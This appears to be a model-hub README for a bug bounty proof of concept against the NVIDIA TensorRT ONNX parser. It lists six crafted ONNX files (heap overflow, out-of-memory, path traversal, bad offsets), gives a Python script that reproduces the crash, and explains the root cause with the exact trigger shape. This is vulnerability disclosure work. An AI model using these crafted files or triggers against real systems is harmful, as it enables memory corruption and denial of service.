--- tags: - security - proof-of-concept license: apache-2.0 --- # TensorRT ONNX Parser - Security PoC Models Bug bounty research submission to huntr.com targeting NVIDIA TensorRT ONNX parser. ## Vulnerabilities | File | Vulnerability | CWE | Severity | |------|--------------|-----|----------| | `eyelike_overflow.onnx` | Integer overflow -> heap OOB write in EyeLike op | CWE-190, CWE-122 | Critical | | `eyelike_small_overflow.onnx` | Same bug, faster crash trigger | CWE-190, CWE-122 | Critical | | `external_oom_length.onnx` | Uncapped length field -> OOM denial of service | CWE-770 | High | | `external_abs_path.onnx` | Absolute path traversal bypass in external weights | CWE-22 | Medium | | `external_neg_offset.onnx` | Negative seek offset in external weights | CWE-20 | Medium | | `external_oob_offset.onnx` | Read past EOF - uninitialized buffer risk | CWE-125 | Medium | ## Reproduce (Finding 1 - Heap OOB Write) ```python import tensorrt as trt logger = trt.Logger(trt.Logger.VERBOSE) builder = trt.Builder(logger) network = builder.create_network( 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)) parser = trt.OnnxParser(network, logger) with open("eyelike_overflow.onnx", "rb") as f: parser.parse(f.read()) # Expected: SIGSEGV / heap-buffer-overflow ``` ## Root Cause (Finding 1) ```cpp // onnxOpImporters.cpp - EyeLike importer int totalWeights = dims.d[0] * dims.d[1]; // int32 overflow! dims are int64_t std::vector values(totalWeights); // undersized allocation for (int32_t r = 0; r < dims.d[0]; ++r) for (int32_t c = 0; c < dims.d[1]; ++c) values[r * dims.d[1] + c] = 0; // OOB WRITE ``` Trigger: input shape `[65537, 65536]` - True product: 4,295,032,832 (overflows int32) - int32 truncated: 65,536 (vector too small) - First OOB write: r=1, c=0 -> index 65,536